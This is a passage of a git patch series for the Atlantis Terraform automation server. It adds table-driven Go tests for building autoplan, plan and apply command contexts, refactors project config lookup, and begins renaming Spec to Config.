From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 29 Jun 2018 14:34:05 +0200
Subject: [PATCH 54/69] Test BuildAutoplanCommands

---
 server/events/comment_parser.go               |   2 +-
 server/events/event_parser.go                 |   4 +-
 server/events/event_parser_test.go            |   6 +-
 server/events/models/models.go                |   1 -
 server/events/project_command_builder.go      | 132 +++--
 server/events/project_command_builder_test.go | 483 +++++++++++++++++-
 server/events/runtime/apply_step_runner.go    |   4 +-
 .../events/runtime/apply_step_runner_test.go  |   5 +-
 server/events/runtime/plan_step_runner.go     |   4 +-
 .../events/runtime/plan_step_runner_test.go   |   6 +-
 server/events/yaml/valid/valid.go             |   7 +-
 11 files changed, 536 insertions(+), 118 deletions(-)

diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go
index c6f9f24395..46e30708ce 100644
--- a/server/events/comment_parser.go
+++ b/server/events/comment_parser.go
@@ -215,7 +215,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen
 	}
 
 	return CommentParseResult{
-		Command: NewCommand(dir, extraArgs, name, verbose, workspace, project),
+		Command: NewCommentCommand(dir, extraArgs, name, verbose, workspace, project),
 	}
 }
 
diff --git a/server/events/event_parser.go b/server/events/event_parser.go
index 3bf4e7f157..0f82cd7afd 100644
--- a/server/events/event_parser.go
+++ b/server/events/event_parser.go
@@ -85,8 +85,8 @@ func (c CommentCommand) String() string {
 	return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, strings.Join(c.Flags, ","))
 }
 
-// NewCommand constructs a Command, setting all missing fields to defaults.
-func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string) *CommentCommand {
+// NewCommentCommand constructs a CommentCommand, setting all missing fields to defaults.
+func NewCommentCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string) *CommentCommand {
 	// If dir was an empty string, this will return '.'.
 	validDir := path.Clean(dir)
 	if validDir == "/" {
diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go
index d7ef7fce70..ba558831bc 100644
--- a/server/events/event_parser_test.go
+++ b/server/events/event_parser_test.go
@@ -344,19 +344,19 @@ func TestNewCommand_CleansDir(t *testing.T) {
 
 	for _, c := range cases {
 		t.Run(c.Dir, func(t *testing.T) {
-			cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "")
+			cmd := events.NewCommentCommand(c.Dir, nil, events.Plan, false, "workspace", "")
 			Equals(t, c.ExpDir, cmd.Dir)
 		})
 	}
 }
 
 func TestNewCommand_EmptyWorkspace(t *testing.T) {
-	cmd := events.NewCommand("dir", nil, events.Plan, false, "", "")
+	cmd := events.NewCommentCommand("dir", nil, events.Plan, false, "", "")
 	Equals(t, "default", cmd.Workspace)
 }
 
 func TestNewCommand_AllFieldsSet(t *testing.T) {
-	cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project")
+	cmd := events.NewCommentCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project")
 	Equals(t, events.CommentCommand{
 		Workspace:   "workspace",
 		Dir:         "dir",
diff --git a/server/events/models/models.go b/server/events/models/models.go
index cc50f1dd12..a9a8455fd3 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -237,6 +237,5 @@ type ProjectCommandContext struct {
 	// ex. atlantis plan -- -target=resource
 	CommentArgs             []string
 	Workspace               string
-	ProjectName             string
 	RequireApprovalOverride bool
 }
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index a850d17b7d..706118118f 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -88,7 +88,6 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 				User:          ctx.User,
 				Log:           ctx.Log,
 				RepoRelPath:   mp.Path,
-				ProjectName:   "",
 				ProjectConfig: nil,
 				GlobalConfig:  nil,
 				CommentArgs:   nil,
@@ -108,10 +107,6 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 		// project config.
 		for i := 0; i < len(matchingProjects); i++ {
 			mp := matchingProjects[i]
-			var projectName string
-			if mp.Name != nil {
-				projectName = *mp.Name
-			}
 			projCtxs = append(projCtxs, models.ProjectCommandContext{
 				BaseRepo:      ctx.BaseRepo,
 				HeadRepo:      ctx.HeadRepo,
@@ -121,7 +116,6 @@ func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext
 				CommentArgs:   nil,
 				Workspace:     mp.Workspace,
 				RepoRelPath:   mp.Dir,
-				ProjectName:   projectName,
 				ProjectConfig: &mp,
 				GlobalConfig:  &config,
 			})
@@ -144,100 +138,88 @@ func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd
 		return projCtx, err
 	}
 
-	var projCfg *valid.Project
-	var globalCfg *valid.Spec
-
-	// Parse config file if it exists.
-	config, err := p.ParserValidator.ReadConfig(repoDir)
-	if err != nil && !os.IsNotExist(err) {
-		return projCtx, err
-	}
-	hasAtlantisYAML := !os.IsNotExist(err)
-	if hasAtlantisYAML {
-		// If they've specified a project by name we look it up. Otherwise we
-		// use the dir and workspace.
-		if cmd.ProjectName != "" {
-			projCfg = config.FindProjectByName(cmd.ProjectName)
-			if projCfg == nil {
-				return projCtx, fmt.Errorf("no project with name %q configured", cmd.ProjectName)
-			}
-		} else {
-			projCfg = config.FindProject(cmd.Dir, cmd.Workspace)
-		}
-		globalCfg = &config
-	}
-
-	if cmd.ProjectName != "" && !hasAtlantisYAML {
-		return projCtx, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)
-	}
-
-	projCtx = models.ProjectCommandContext{
-		BaseRepo:      ctx.BaseRepo,
-		HeadRepo:      ctx.HeadRepo,
-		Pull:          ctx.Pull,
-		User:          ctx.User,
-		Log:           ctx.Log,
-		CommentArgs:   cmd.Flags,
-		Workspace:     cmd.Workspace,
-		RepoRelPath:   cmd.Dir,
-		ProjectName:   cmd.ProjectName,
-		ProjectConfig: projCfg,
-		GlobalConfig:  globalCfg,
-	}
-	return projCtx, nil
+	return p.buildProjectCommandCtx(ctx, cmd, repoDir)
 }
 
 func (p *DefaultProjectCommandBuilder) BuildApplyCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
 	var projCtx models.ProjectCommandContext
 
-	repoDir, err := p.WorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, cmd.Workspace)
+	unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
 	if err != nil {
 		return projCtx, err
 	}
+	defer unlockFn()
 
-	// todo: can deduplicate this between PlanViaComment
-	var projCfg *valid.Project
-	var globalCfg *valid.Spec
-
-	// Parse config file if it exists.
-	config, err := p.ParserValidator.ReadConfig(repoDir)
-	if err != nil && !os.IsNotExist(err) {
+	repoDir, err := p.WorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, cmd.Workspace)
+	if err != nil {
 		return projCtx, err
 	}
-	hasAtlantisYAML := !os.IsNotExist(err)
-	if hasAtlantisYAML {
-		// If they've specified a project by name we look it up. Otherwise we
-		// use the dir and workspace.
-		if cmd.ProjectName != "" {
-			projCfg = config.FindProjectByName(cmd.ProjectName)
-			if projCfg == nil {
-				return projCtx, fmt.Errorf("no project with name %q configured", cmd.ProjectName)
-			}
-		} else {
-			projCfg = config.FindProject(cmd.Dir, cmd.Workspace)
-		}
-		globalCfg = &config
+
+	return p.buildProjectCommandCtx(ctx, cmd, repoDir)
+}
+
+func (p *DefaultProjectCommandBuilder) buildProjectCommandCtx(ctx *CommandContext, cmd *CommentCommand, repoDir string) (models.ProjectCommandContext, error) {
+	projCfg, globalCfg, err := p.getCfg(cmd.ProjectName, cmd.Dir, cmd.Workspace, repoDir)
+	if err != nil {
+		return models.ProjectCommandContext{}, err
 	}
 
-	if cmd.ProjectName != "" && !hasAtlantisYAML {
-		return projCtx, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)
+	// Override any dir/workspace defined on the comment with what was
+	// defined in config. This shouldn't matter since we don't allow comments
+	// with both project name and dir/workspace.
+	dir := cmd.Dir
+	workspace := cmd.Workspace
+	if projCfg != nil {
+		dir = projCfg.Dir
+		workspace = projCfg.Workspace
 	}
 
-	projCtx = models.ProjectCommandContext{
+	return models.ProjectCommandContext{
 		BaseRepo:                ctx.BaseRepo,
 		HeadRepo:                ctx.HeadRepo,
 		Pull:                    ctx.Pull,
 		User:                    ctx.User,
 		Log:                     ctx.Log,
 		CommentArgs:             cmd.Flags,
-		Workspace:               cmd.Workspace,
-		RepoRelPath:             cmd.Dir,
-		ProjectName:             cmd.ProjectName,
+		Workspace:               workspace,
+		RepoRelPath:             dir,
 		ProjectConfig:           projCfg,
 		GlobalConfig:            globalCfg,
 		RequireApprovalOverride: p.RequireApproval,
+	}, nil
+}
+
+func (p *DefaultProjectCommandBuilder) getCfg(projectName string, dir string, workspace string, repoDir string) (*valid.Project, *valid.Spec, error) {
+	globalCfg, err := p.ParserValidator.ReadConfig(repoDir)
+	if err != nil && !os.IsNotExist(err) {
+		return nil, nil, err
+	}
+	hasAtlantisYAML := !os.IsNotExist(err)
+	if !hasAtlantisYAML && projectName != "" {
+		return nil, nil, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)
+	}
+	if !hasAtlantisYAML {
+		return nil, nil, nil
+	}
+
+	// If they've specified a project by name we look it up. Otherwise we
+	// use the dir and workspace.
+	if projectName != "" {
+		projCfg := globalCfg.FindProjectByName(projectName)
+		if projCfg == nil {
+			return nil, nil, fmt.Errorf("no project with name %q is defined in %s", projectName, yaml.AtlantisYAMLFilename)
+		}
+		return projCfg, &globalCfg, nil
+	}
+
+	projCfgs := globalCfg.FindProjectsByDirWorkspace(dir, workspace)
+	if len(projCfgs) == 0 {
+		return nil, nil, nil
+	}
+	if len(projCfgs) > 1 {
+		return nil, nil, fmt.Errorf("must specify project name: more than one project defined in %s matched dir: %q workspace: %q", yaml.AtlantisYAMLFilename, dir, workspace)
 	}
-	return projCtx, nil
+	return &projCfgs[0], &globalCfg, nil
 }
 
 // matchingProjects returns the list of projects whose WhenModified fields match
diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go
index 41ace8e02f..5ef72a5a77 100644
--- a/server/events/project_command_builder_test.go
+++ b/server/events/project_command_builder_test.go
@@ -1,29 +1,458 @@
 package events_test
 
-//. "github.com/runatlantis/atlantis/testing"
-
-//func TestBuildAutoplanCommands(t *testing.T) {
-//	tmpDir, cleanup := TempDir(t)
-//	defer cleanup()
-//
-//	workspace := mocks.NewMockWorkingDir()
-//	vcsClient := vcsmocks.NewMockClientProxy()
-//
-//	builder := &events.DefaultProjectCommandBuilder{
-//		WorkingDirLocker: events.NewDefaultAtlantisWorkingDirLocker(),
-//		Workspace:               workspace,
-//		ParserValidator:         &yaml.ParserValidator{},
-//		VCSClient:               vcsClient,
-//		ProjectFinder:           &events.DefaultProjectFinder{},
-//	}
-//
-//	// If autoplan is false, should return empty steps.
-//	ctxs, err := builder.BuildAutoplanCommands(&events.CommandContext{
-//		BaseRepo: models.Repo{},
-//		HeadRepo: models.Repo{},
-//		Pull:     models.PullRequest{},
-//		User:     models.User{},
-//		Log:      nil,
-//	})
-//	Ok(t, err)
-//}
+import (
+	"io/ioutil"
+	"path/filepath"
+	"testing"
+
+	. "github.com/petergtz/pegomock"
+	"github.com/runatlantis/atlantis/server/events"
+	"github.com/runatlantis/atlantis/server/events/mocks"
+	"github.com/runatlantis/atlantis/server/events/models"
+	vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
+	"github.com/runatlantis/atlantis/server/logging"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestDefaultProjectCommandBuilder_BuildAutoplanCommands(t *testing.T) {
+	// exp defines what we will assert on. We don't check all fields in the
+	// actual contexts.
+	type exp struct {
+		projectConfig *valid.Project
+		dir           string
+		workspace     string
+	}
+	cases := []struct {
+		Description  string
+		AtlantisYAML string
+		exp          []exp
+	}{
+		{
+			Description:  "no atlantis.yaml",
+			AtlantisYAML: "",
+			exp: []exp{
+				{
+					projectConfig: nil,
+					dir:           ".",
+					workspace:     "default",
+				},
+			},
+		},
+		{
+			Description: "autoplan disabled",
+			AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+  autoplan:
+    enabled: false`,
+			exp: nil,
+		},
+		{
+			Description: "simple atlantis.yaml",
+			AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+`,
+			exp: []exp{
+				{
+					projectConfig: &valid.Project{
+						Dir:       ".",
+						Workspace: "default",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"**/*.tf"},
+						},
+					},
+					dir:       ".",
+					workspace: "default",
+				},
+			},
+		},
+		{
+			Description: "some projects disabled",
+			AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+  autoplan:
+    enabled: false
+- dir: .
+  workspace: myworkspace
+  autoplan:
+    when_modified: ["main.tf"]
+- dir: .
+  workspace: myworkspace2
+`,
+			exp: []exp{
+				{
+					projectConfig: &valid.Project{
+						Dir:       ".",
+						Workspace: "myworkspace",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"main.tf"},
+						},
+					},
+					dir:       ".",
+					workspace: "myworkspace",
+				},
+				{
+					projectConfig: &valid.Project{
+						Dir:       ".",
+						Workspace: "myworkspace2",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"**/*.tf"},
+						},
+					},
+					dir:       ".",
+					workspace: "myworkspace2",
+				},
+			},
+		},
+		{
+			Description: "some projects disabled",
+			AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+  autoplan:
+    enabled: false
+- dir: .
+  workspace: myworkspace
+  autoplan:
+    when_modified: ["main.tf"]
+- dir: .
+  workspace: myworkspace2
+`,
+			exp: []exp{
+				{
+					projectConfig: &valid.Project{
+						Dir:       ".",
+						Workspace: "myworkspace",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"main.tf"},
+						},
+					},
+					dir:       ".",
+					workspace: "myworkspace",
+				},
+				{
+					projectConfig: &valid.Project{
+						Dir:       ".",
+						Workspace: "myworkspace2",
+						Autoplan: valid.Autoplan{
+							Enabled:      true,
+							WhenModified: []string{"**/*.tf"},
+						},
+					},
+					dir:       ".",
+					workspace: "myworkspace2",
+				},
+			},
+		},
+		{
+			Description: "no projects modified",
+			AtlantisYAML: `
+version: 2
+projects:
+- dir: mydir
+`,
+			exp: nil,
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.Description, func(t *testing.T) {
+			RegisterMockTestingT(t)
+			tmpDir, cleanup := TempDir(t)
+			defer cleanup()
+
+			baseRepo := models.Repo{}
+			headRepo := models.Repo{}
+			pull := models.PullRequest{}
+			logger := logging.NewNoopLogger()
+			workingDir := mocks.NewMockWorkingDir()
+			When(workingDir.Clone(logger, baseRepo, headRepo, pull, "default")).ThenReturn(tmpDir, nil)
+			if c.AtlantisYAML != "" {
+				err := ioutil.WriteFile(filepath.Join(tmpDir, yaml.AtlantisYAMLFilename), []byte(c.AtlantisYAML), 0600)
+				Ok(t, err)
+			}
+			err := ioutil.WriteFile(filepath.Join(tmpDir, "main.tf"), nil, 0600)
+			Ok(t, err)
+
+			vcsClient := vcsmocks.NewMockClientProxy()
+			When(vcsClient.GetModifiedFiles(baseRepo, pull)).ThenReturn([]string{"main.tf"}, nil)
+
+			builder := &events.DefaultProjectCommandBuilder{
+				WorkingDirLocker: events.NewDefaultAtlantisWorkingDirLocker(),
+				WorkingDir:       workingDir,
+				ParserValidator:  &yaml.ParserValidator{},
+				VCSClient:        vcsClient,
+				ProjectFinder:    &events.DefaultProjectFinder{},
+			}
+
+			ctxs, err := builder.BuildAutoplanCommands(&events.CommandContext{
+				BaseRepo: baseRepo,
+				HeadRepo: headRepo,
+				Pull:     pull,
+				User:     models.User{},
+				Log:      logger,
+			})
+			Ok(t, err)
+			Equals(t, len(c.exp), len(ctxs))
+
+			for i, actCtx := range ctxs {
+				expCtx := c.exp[i]
+				Equals(t, baseRepo, actCtx.BaseRepo)
+				Equals(t, baseRepo, actCtx.HeadRepo)
+				Equals(t, pull, actCtx.Pull)
+				Equals(t, models.User{}, actCtx.User)
+				Equals(t, logger, actCtx.Log)
+				Equals(t, 0, len(actCtx.CommentArgs))
+				Equals(t, false, actCtx.RequireApprovalOverride)
+
+				Equals(t, expCtx.projectConfig, actCtx.ProjectConfig)
+				Equals(t, expCtx.dir, actCtx.RepoRelPath)
+				Equals(t, expCtx.workspace, actCtx.Workspace)
+			}
+		})
+	}
+}
+
+func TestDefaultProjectCommandBuilder_BuildPlanApplyCommand(t *testing.T) {
+	cases := []struct {
+		Description      string
+		AtlantisYAML     string
+		Cmd              events.CommentCommand
+		ExpProjectConfig *valid.Project
+		ExpCommentArgs   []string
+		ExpWorkspace     string
+		ExpDir           string
+		ExpErr           string
+	}{
+		{
+			Description: "no atlantis.yaml",
+			Cmd: events.CommentCommand{
+				Dir:       ".",
+				Flags:     []string{"commentarg"},
+				Name:      events.Plan,
+				Workspace: "myworkspace",
+			},
+			AtlantisYAML:     "",
+			ExpProjectConfig: nil,
+			ExpCommentArgs:   []string{"commentarg"},
+			ExpWorkspace:     "myworkspace",
+			ExpDir:           ".",
+		},
+		{
+			Description: "no atlantis.yaml with project flag",
+			Cmd: events.CommentCommand{
+				Dir:         ".",
+				Name:        events.Plan,
+				ProjectName: "myproject",
+			},
+			AtlantisYAML: "",
+			ExpErr:       "cannot specify a project name unless an atlantis.yaml file exists to configure projects",
+		},
+		{
+			Description: "simple atlantis.yaml",
+			Cmd: events.CommentCommand{
+				Dir:       ".",
+				Name:      events.Plan,
+				Workspace: "myworkspace",
+			},
+			AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+  workspace: myworkspace
+  apply_requirements: [approved]`,
+			ExpProjectConfig: &valid.Project{
+				Dir:       ".",
+				Workspace: "myworkspace",
+				Autoplan: valid.Autoplan{
+					WhenModified: []string{"**/*.tf"},
+					Enabled:      true,
+				},
+				ApplyRequirements: []string{"approved"},
+			},
+			ExpWorkspace: "myworkspace",
+			ExpDir:       ".",
+		},
+		{
+			Description: "atlantis.yaml wrong dir",
+			Cmd: events.CommentCommand{
+				Dir:       ".",
+				Name:      events.Plan,
+				Workspace: "myworkspace",
+			},
+			AtlantisYAML: `
+version: 2
+projects:
+- dir: notroot
+  workspace: myworkspace
+  apply_requirements: [approved]`,
+			ExpProjectConfig: nil,
+			ExpWorkspace:     "myworkspace",
+			ExpDir:           ".",
+		},
+		{
+			Description: "atlantis.yaml wrong workspace",
+			Cmd: events.CommentCommand{
+				Dir:       ".",
+				Name:      events.Plan,
+				Workspace: "myworkspace",
+			},
+			AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+  workspace: notmyworkspace
+  apply_requirements: [approved]`,
+			ExpProjectConfig: nil,
+			ExpWorkspace:     "myworkspace",
+			ExpDir:           ".",
+		},
+		{
+			Description: "atlantis.yaml with projectname",
+			Cmd: events.CommentCommand{
+				Name:        events.Plan,
+				ProjectName: "myproject",
+			},
+			AtlantisYAML: `
+version: 2
+projects:
+- name: myproject
+  dir: .
+  workspace: myworkspace
+  apply_requirements: [approved]`,
+			ExpProjectConfig: &valid.Project{
+				Dir:       ".",
+				Workspace: "myworkspace",
+				Autoplan: valid.Autoplan{
+					WhenModified: []string{"**/*.tf"},
+					Enabled:      true,
+				},
+				ApplyRequirements: []string{"approved"},
+				Name:              String("myproject"),
+			},
+			ExpWorkspace: "myworkspace",
+			ExpDir:       ".",
+		},
+		{
+			Description: "atlantis.yaml with multiple dir/workspaces matching",
+			Cmd: events.CommentCommand{
+				Name:      events.Plan,
+				Dir:       ".",
+				Workspace: "myworkspace",
+			},
+			AtlantisYAML: `
+version: 2
+projects:
+- name: myproject
+  dir: .
+  workspace: myworkspace
+  apply_requirements: [approved]
+- name: myproject2
+  dir: .
+  workspace: myworkspace
+`,
+			ExpErr: "must specify project name: more than one project defined in atlantis.yaml matched dir: \".\" workspace: \"myworkspace\"",
+		},
+		{
+			Description: "atlantis.yaml with project flag not matching",
+			Cmd: events.CommentCommand{
+				Name:        events.Plan,
+				Dir:         ".",
+				Workspace:   "default",
+				ProjectName: "notconfigured",
+			},
+			AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+`,
+			ExpErr: "no project with name \"notconfigured\" is defined in atlantis.yaml",
+		},
+	}
+
+	for _, c := range cases {
+		// NOTE: we're testing both plan and apply here.
+		for _, cmdName := range []events.CommandName{events.Plan, events.Apply} {
+			t.Run(c.Description, func(t *testing.T) {
+				RegisterMockTestingT(t)
+				tmpDir, cleanup := TempDir(t)
+				defer cleanup()
+
+				baseRepo := models.Repo{}
+				headRepo := models.Repo{}
+				pull := models.PullRequest{}
+				logger := logging.NewNoopLogger()
+				workingDir := mocks.NewMockWorkingDir()
+				if cmdName == events.Plan {
+					When(workingDir.Clone(logger, baseRepo, headRepo, pull, c.Cmd.Workspace)).ThenReturn(tmpDir, nil)
+				} else {
+					When(workingDir.GetWorkingDir(baseRepo, pull, c.Cmd.Workspace)).ThenReturn(tmpDir, nil)
+				}
+				if c.AtlantisYAML != "" {
+					err := ioutil.WriteFile(filepath.Join(tmpDir, yaml.AtlantisYAMLFilename), []byte(c.AtlantisYAML), 0600)
+					Ok(t, err)
+				}
+				err := ioutil.WriteFile(filepath.Join(tmpDir, "main.tf"), nil, 0600)
+				Ok(t, err)
+
+				vcsClient := vcsmocks.NewMockClientProxy()
+				When(vcsClient.GetModifiedFiles(baseRepo, pull)).ThenReturn([]string{"main.tf"}, nil)
+
+				builder := &events.DefaultProjectCommandBuilder{
+					WorkingDirLocker: events.NewDefaultAtlantisWorkingDirLocker(),
+					WorkingDir:       workingDir,
+					ParserValidator:  &yaml.ParserValidator{},
+					VCSClient:        vcsClient,
+					ProjectFinder:    &events.DefaultProjectFinder{},
+				}
+
+				cmdCtx := &events.CommandContext{
+					BaseRepo: baseRepo,
+					HeadRepo: headRepo,
+					Pull:     pull,
+					User:     models.User{},
+					Log:      logger,
+				}
+				var actCtx models.ProjectCommandContext
+
+				if cmdName == events.Plan {
+					actCtx, err = builder.BuildPlanCommand(cmdCtx, &c.Cmd)
+				} else {
+					actCtx, err = builder.BuildApplyCommand(cmdCtx, &c.Cmd)
+				}
+
+				if c.ExpErr != "" {
+					ErrEquals(t, c.ExpErr, err)
+					return
+				}
+
+				Ok(t, err)
+				Equals(t, baseRepo, actCtx.BaseRepo)
+				Equals(t, baseRepo, actCtx.HeadRepo)
+				Equals(t, pull, actCtx.Pull)
+				Equals(t, models.User{}, actCtx.User)
+				Equals(t, logger, actCtx.Log)
+				Equals(t, false, actCtx.RequireApprovalOverride)
+
+				Equals(t, c.ExpProjectConfig, actCtx.ProjectConfig)
+				Equals(t, c.ExpDir, actCtx.RepoRelPath)
+				Equals(t, c.ExpWorkspace, actCtx.Workspace)
+				Equals(t, c.ExpCommentArgs, actCtx.CommentArgs)
+			})
+		}
+	}
+}
+
+func String(v string) *string { return &v }
diff --git a/server/events/runtime/apply_step_runner.go b/server/events/runtime/apply_step_runner.go
index 2cb3a50c1d..caea2919c2 100644
--- a/server/events/runtime/apply_step_runner.go
+++ b/server/events/runtime/apply_step_runner.go
@@ -17,8 +17,8 @@ type ApplyStepRunner struct {
 func (a *ApplyStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
 	// todo: move this to a common library
 	planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace)
-	if ctx.ProjectName != "" {
-		planFileName = fmt.Sprintf("%s-%s", ctx.ProjectName, planFileName)
+	if ctx.ProjectConfig != nil && ctx.ProjectConfig.Name != nil {
+		planFileName = fmt.Sprintf("%s-%s", *ctx.ProjectConfig.Name, planFileName)
 	}
 	planFile := filepath.Join(path, planFileName)
 	stat, err := os.Stat(planFile)
diff --git a/server/events/runtime/apply_step_runner_test.go b/server/events/runtime/apply_step_runner_test.go
index 4ebdc39c05..50c6693ee4 100644
--- a/server/events/runtime/apply_step_runner_test.go
+++ b/server/events/runtime/apply_step_runner_test.go
@@ -81,10 +81,13 @@ func TestRun_AppliesCorrectProjectPlan(t *testing.T) {
 
 	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
 		ThenReturn("output", nil)
+	projectName := "projectname"
 	output, err := o.Run(models.ProjectCommandContext{
 		Workspace:   "default",
 		RepoRelPath: ".",
-		ProjectName: "projectname",
+		ProjectConfig: &valid.Project{
+			Name: &projectName,
+		},
 		CommentArgs: []string{"comment", "args"},
 	}, []string{"extra", "args"}, tmpDir)
 	Ok(t, err)
diff --git a/server/events/runtime/plan_step_runner.go b/server/events/runtime/plan_step_runner.go
index f0e49b6ed7..88f4abc2d9 100644
--- a/server/events/runtime/plan_step_runner.go
+++ b/server/events/runtime/plan_step_runner.go
@@ -34,8 +34,8 @@ func (p *PlanStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []strin
 
 	// todo: move this to a common library
 	planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace)
-	if ctx.ProjectName != "" {
-		planFileName = fmt.Sprintf("%s-%s", ctx.ProjectName, planFileName)
+	if ctx.ProjectConfig != nil && ctx.ProjectConfig.Name != nil {
+		planFileName = fmt.Sprintf("%s-%s", *ctx.ProjectConfig.Name, planFileName)
 	}
 	planFile := filepath.Join(path, planFileName)
 	userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username)
diff --git a/server/events/runtime/plan_step_runner_test.go b/server/events/runtime/plan_step_runner_test.go
index 01dce930ba..6c46886992 100644
--- a/server/events/runtime/plan_step_runner_test.go
+++ b/server/events/runtime/plan_step_runner_test.go
@@ -14,6 +14,7 @@ import (
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
 )
@@ -282,13 +283,16 @@ func TestRun_UsesDiffPathForProject(t *testing.T) {
 	expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/projectname-default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
 	When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "default")).ThenReturn("output", nil)
 
+	projectName := "projectname"
 	output, err := s.Run(models.ProjectCommandContext{
 		Log:         logger,
 		Workspace:   "default",
 		RepoRelPath: ".",
-		ProjectName: "projectname",
 		User:        models.User{Username: "username"},
 		CommentArgs: []string{"comment", "args"},
+		ProjectConfig: &valid.Project{
+			Name: &projectName,
+		},
 	}, []string{"extra", "args"}, "/path")
 	Ok(t, err)
 	Equals(t, "output", output)
diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go
index fd182902aa..8af0064be1 100644
--- a/server/events/yaml/valid/valid.go
+++ b/server/events/yaml/valid/valid.go
@@ -31,13 +31,14 @@ func (s Spec) GetApplyStage(workflowName string) *Stage {
 	return nil
 }
 
-func (s Spec) FindProject(dir string, workspace string) *Project {
+func (s Spec) FindProjectsByDirWorkspace(dir string, workspace string) []Project {
+	var ps []Project
 	for _, p := range s.Projects {
 		if p.Dir == dir && p.Workspace == workspace {
-			return &p
+			ps = append(ps, p)
 		}
 	}
-	return nil
+	return ps
 }
 
 func (s Spec) FindProjectByName(name string) *Project {

From 507ce4358a050f938a7003517b87b9ce89f886f4 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 29 Jun 2018 17:33:02 +0200
Subject: [PATCH 55/69] Rename Spec -> Config

---
 server/events/models/models.go                |  2 +-
 server/events/project_command_builder.go      |  4 +-
 .../events/yaml/mocks/matchers/valid_spec.go  | 10 ++--
 .../yaml/mocks/mock_parser_validator.go       |  8 ++--
 server/events/yaml/parser_validator.go        | 44 ++++++++---------
 server/events/yaml/parser_validator_test.go   | 32 ++++++-------
 server/events/yaml/raw/{spec.go => config.go} | 23 ++++-----
 .../yaml/raw/{spec_test.go => config_test.go} | 48 +++++++++----------
 server/events/yaml/raw/raw.go                 |  4 +-
 server/events/yaml/valid/valid.go             | 24 +++++-----
 10 files changed, 100 insertions(+), 99 deletions(-)
 rename server/events/yaml/raw/{spec.go => config.go} (60%)
 rename server/events/yaml/raw/{spec_test.go => config_test.go} (88%)

diff --git a/server/events/models/models.go b/server/events/models/models.go
index a9a8455fd3..85f93cf3af 100644
--- a/server/events/models/models.go
+++ b/server/events/models/models.go
@@ -231,7 +231,7 @@ type ProjectCommandContext struct {
 	Log           *logging.SimpleLogger
 	RepoRelPath   string
 	ProjectConfig *valid.Project
-	GlobalConfig  *valid.Spec
+	GlobalConfig  *valid.Config
 
 	// CommentArgs are the extra arguments appended to comment,
 	// ex. atlantis plan -- -target=resource
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
index 706118118f..2ce8d85f07 100644
--- a/server/events/project_command_builder.go
+++ b/server/events/project_command_builder.go
@@ -189,7 +189,7 @@ func (p *DefaultProjectCommandBuilder) buildProjectCommandCtx(ctx *CommandContex
 	}, nil
 }
 
